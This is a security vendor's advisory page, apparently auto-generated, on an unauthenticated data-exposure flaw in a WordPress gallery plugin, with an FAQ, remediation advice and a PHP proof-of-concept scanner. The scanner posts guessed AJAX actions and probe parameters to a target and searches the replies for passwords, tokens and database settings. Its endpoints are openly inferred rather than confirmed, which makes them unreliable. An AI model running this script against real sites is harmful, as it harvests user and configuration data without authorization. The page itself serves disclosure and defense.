What is CVE-2026-0675?

CVE-2026-0675 is a medium-severity vulnerability in the NextGEN Download Gallery plugin for WordPress, present in versions up to and including 1.6.2. It allows unauthenticated attackers to access sensitive user or configuration data due to improper access controls.

How does this vulnerability work?

The vulnerability arises from the plugin’s failure to implement proper authorization checks on its AJAX endpoints or REST API routes. This allows attackers to send crafted HTTP requests to retrieve sensitive information without needing to authenticate.

Who is affected by this vulnerability?

Any WordPress site using the NextGEN Download Gallery plugin version 1.6.2 or earlier is vulnerable. Administrators should check their plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the NextGEN Download Gallery plugin installed on your WordPress site. If it is version 1.6.2 or earlier, your site is potentially vulnerable to CVE-2026-0675.

What should I do to fix this vulnerability?

To mitigate this vulnerability, update the NextGEN Download Gallery plugin to the latest version that addresses the issue. Additionally, ensure that proper authorization checks are implemented on all AJAX and REST API endpoints.

What does a CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium level of severity, suggesting that the vulnerability is moderately exploitable. This score reflects factors such as network accessibility and the potential impact on confidentiality.

What risks does this vulnerability pose?

Exploitation of this vulnerability can lead to the exposure of sensitive data, such as user email addresses and configuration settings. While it does not allow for privilege escalation, the leaked information could facilitate further attacks.

How does the proof of concept demonstrate the issue?

The proof of concept outlines a method to exploit the vulnerability by sending specific HTTP requests to the vulnerable endpoints. It illustrates how attackers can retrieve sensitive data without authentication, confirming the existence of the flaw.

What are AJAX endpoints and REST API routes?

AJAX endpoints and REST API routes are mechanisms in WordPress that allow asynchronous data retrieval and manipulation. If these endpoints lack proper authorization checks, they can be exploited to access sensitive information.

What are proper authorization checks?

Proper authorization checks involve validating that a user has the necessary permissions before allowing access to sensitive data. This can be achieved using functions like current_user_can() for AJAX requests or implementing permission callbacks for REST API routes.

Can I use this vulnerability for educational purposes?

While the proof of concept is intended for educational purposes, it is crucial to obtain explicit permission before testing any systems. Unauthorized testing may violate laws and regulations, including the Computer Fraud and Abuse Act.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-0675: NextGEN Download Gallery <= 1.6.2 – Unauthenticated Information Exposure (nextgen-download-gallery)

CVE ID CVE-2026-0675

Plugin nextgen-download-gallery

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 1.6.2

Patched Version —

Disclosed January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0675 (metadata-based):
The NextGEN Download Gallery plugin for WordPress contains an unauthenticated information exposure vulnerability in all versions up to and including 1.6.2. This vulnerability allows attackers without authentication to extract sensitive user or configuration data from affected WordPress sites. The CVSS score of 5.3 (Medium severity) reflects the network accessibility, low attack complexity, and confidentiality impact of this flaw.

Atomic Edge research infers the root cause is likely improper access control on a WordPress AJAX endpoint or REST API route registered by the plugin. The CWE-200 classification indicates the plugin exposes sensitive data without verifying the user’s authorization. Without code analysis, this conclusion is inferred from the vulnerability description and common WordPress plugin patterns. The plugin likely registers a callback function via wp_ajax_nopriv_ or the REST API without implementing capability checks, allowing unauthenticated requests to trigger data retrieval functions.

Exploitation involves sending HTTP requests to the WordPress site targeting the vulnerable endpoint. Attackers would likely target /wp-admin/admin-ajax.php with an action parameter matching the plugin’s AJAX hook, such as nextgen_download_gallery_get_data or similar. Alternatively, they might target a REST API route like /wp-json/nextgen-download-gallery/v1/data. The payload would consist of carefully crafted parameters that trigger the information disclosure, potentially including user IDs, post IDs, or configuration option names to extract specific sensitive data.

Remediation requires implementing proper authorization checks before data retrieval. The plugin should verify the current user has appropriate capabilities (using current_user_can()) or implement nonce verification for AJAX endpoints. For REST API endpoints, the permission_callback parameter must validate user permissions. The plugin should also sanitize and validate all input parameters before using them in database queries or file operations.

Successful exploitation exposes sensitive WordPress site data to unauthenticated attackers. This could include user email addresses, hashed passwords, API keys, database credentials from configuration files, or private media metadata. While the vulnerability does not directly enable privilege escalation or remote code execution, the exposed information could facilitate further attacks such as credential stuffing, social engineering, or targeted exploitation of other vulnerabilities.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-0675 - NextGEN Download Gallery <= 1.6.2 - Unauthenticated Information Exposure
<?php

/**
 * Proof of Concept for CVE-2026-0675
 * This script attempts to exploit the unauthenticated information exposure vulnerability
 * in the NextGEN Download Gallery WordPress plugin.
 * 
 * ASSUMPTIONS (based on metadata analysis):
 * 1. The plugin registers an AJAX endpoint without proper authorization checks
 * 2. The endpoint responds to unauthenticated requests (wp_ajax_nopriv_ hook)
 * 3. The endpoint returns sensitive data when triggered with specific parameters
 * 4. Common AJAX action names based on plugin slug are tested
 */

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS

// Common AJAX action patterns for NextGEN Download Gallery plugin
$action_patterns = [
    'nextgen_download_gallery_get_data',
    'ngg_download_gallery',
    'nextgen_download',
    'ngg_download',
    'download_gallery',
    'nextgen_gallery_download'
];

// Common parameters that might trigger data exposure
$test_params = [
    'id' => '1',
    'user_id' => '1',
    'post_id' => '1',
    'option' => 'admin_email',
    'data' => 'users',
    'type' => 'config',
    'file' => 'config',
    'gallery_id' => '1'
];

echo "[+] Testing target: $target_urln";
echo "[+] Testing common AJAX endpoints for information exposurenn";

foreach ($action_patterns as $action) {
    $url = $target_url . '/wp-admin/admin-ajax.php';
    $post_data = array_merge(['action' => $action], $test_params);
    
    echo "[*] Testing action: $actionn";
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    curl_close($ch);
    
    if ($http_code == 200 && !empty($response)) {
        // Check if response contains potentially sensitive data
        $sensitive_indicators = [
            'user_email', 'user_login', 'user_pass', 'admin',
            'wp_', 'password', 'secret', 'key', 'token',
            'database', 'DB_', 'localhost', '127.0.0.1'
        ];
        
        $found_sensitive = false;
        foreach ($sensitive_indicators as $indicator) {
            if (stripos($response, $indicator) !== false) {
                $found_sensitive = true;
                break;
            }
        }
        
        if ($found_sensitive) {
            echo "[!] POTENTIAL VULNERABILITY DETECTEDn";
            echo "[!] Action: $action returned potentially sensitive datan";
            echo "[!] Response preview: " . substr($response, 0, 500) . "...nn";
        } else {
            echo "[+] Action $action responded but no obvious sensitive data detectedn";
            echo "[+] Response: " . substr($response, 0, 200) . "...nn";
        }
    } else {
        echo "[-] Action $action returned HTTP $http_code or empty responsenn";
    }
}

echo "[+] Testing complete. Manual review of responses is required.n";

?>

Frequently Asked Questions

What is CVE-2026-0675?
Understanding the vulnerability
CVE-2026-0675 is a medium-severity vulnerability in the NextGEN Download Gallery plugin for WordPress, present in versions up to and including 1.6.2. It allows unauthenticated attackers to access sensitive user or configuration data due to improper access controls.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the plugin’s failure to implement proper authorization checks on its AJAX endpoints or REST API routes. This allows attackers to send crafted HTTP requests to retrieve sensitive information without needing to authenticate.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the NextGEN Download Gallery plugin version 1.6.2 or earlier is vulnerable. Administrators should check their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify the version of the NextGEN Download Gallery plugin installed on your WordPress site. If it is version 1.6.2 or earlier, your site is potentially vulnerable to CVE-2026-0675.
What should I do to fix this vulnerability?
Recommended remediation steps
To mitigate this vulnerability, update the NextGEN Download Gallery plugin to the latest version that addresses the issue. Additionally, ensure that proper authorization checks are implemented on all AJAX and REST API endpoints.
What does a CVSS score of 5.3 indicate?
Understanding severity ratings
A CVSS score of 5.3 indicates a medium level of severity, suggesting that the vulnerability is moderately exploitable. This score reflects factors such as network accessibility and the potential impact on confidentiality.
What risks does this vulnerability pose?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to the exposure of sensitive data, such as user email addresses and configuration settings. While it does not allow for privilege escalation, the leaked information could facilitate further attacks.
How does the proof of concept demonstrate the issue?
Understanding the exploit
The proof of concept outlines a method to exploit the vulnerability by sending specific HTTP requests to the vulnerable endpoints. It illustrates how attackers can retrieve sensitive data without authentication, confirming the existence of the flaw.
What are AJAX endpoints and REST API routes?
Key components in WordPress
AJAX endpoints and REST API routes are mechanisms in WordPress that allow asynchronous data retrieval and manipulation. If these endpoints lack proper authorization checks, they can be exploited to access sensitive information.
What are proper authorization checks?
Ensuring secure data access
Proper authorization checks involve validating that a user has the necessary permissions before allowing access to sensitive data. This can be achieved using functions like current_user_can() for AJAX requests or implementing permission callbacks for REST API routes.
Can I use this vulnerability for educational purposes?
Legal considerations
While the proof of concept is intended for educational purposes, it is crucial to obtain explicit permission before testing any systems. Unauthorized testing may violate laws and regulations, including the Computer Fraud and Abuse Act.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations